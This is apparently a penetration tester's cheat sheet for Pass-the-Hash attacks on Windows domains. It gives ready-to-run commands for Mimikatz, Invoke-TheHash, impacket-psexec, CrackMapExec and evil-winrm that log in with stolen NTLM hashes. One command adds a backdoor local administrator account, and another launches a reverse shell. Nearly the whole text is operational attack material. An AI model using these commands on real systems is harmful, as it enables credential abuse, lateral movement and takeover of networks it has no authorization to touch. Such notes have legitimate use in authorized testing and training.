Pass-the-Hash (PtH)

From Windows

Mimikatz

mimikatz.exe privilege::debug "sekurlsa::pth /user:eren /rc4:paste-hash-here /domain:domain.local /run:cmd.exe" exit

PowerShell Invoke-TheHash

# Importing the module
Import-Module .\Invoke-TheHash.psd1

# Invoke-TheHash with SMB
# The command below adds a local administrator account on the target system
Invoke-SMBExec -Target ip -Domain domain.com -Username eren -Hash paste-hash -Command "net user eren Password123 /add && net localgroup administrators eren /add" -Verbose

# Invoke-TheHash with WMI
# The command below runs a reverse shell
Invoke-WMIExec -Target DC01 -Domain Administrator -Username eren -Hash paste-hash -Command "powershell -e reverse can be copied from revshells.com"

From Linux

Impacket-Psexec

impacket-psexec administrator@ip -hashes :30B3783CE2ABF1AF70F77D0660CF3453

CrackMapExec

crackmapexec smb 10.10.1.0/24 -u Administrator -d . -H hash

crackmapexec smb ip -u Administrator -d . -H hash -x whoami

evil-winrm

evil-winrm -i ip -u Administrator -H hash
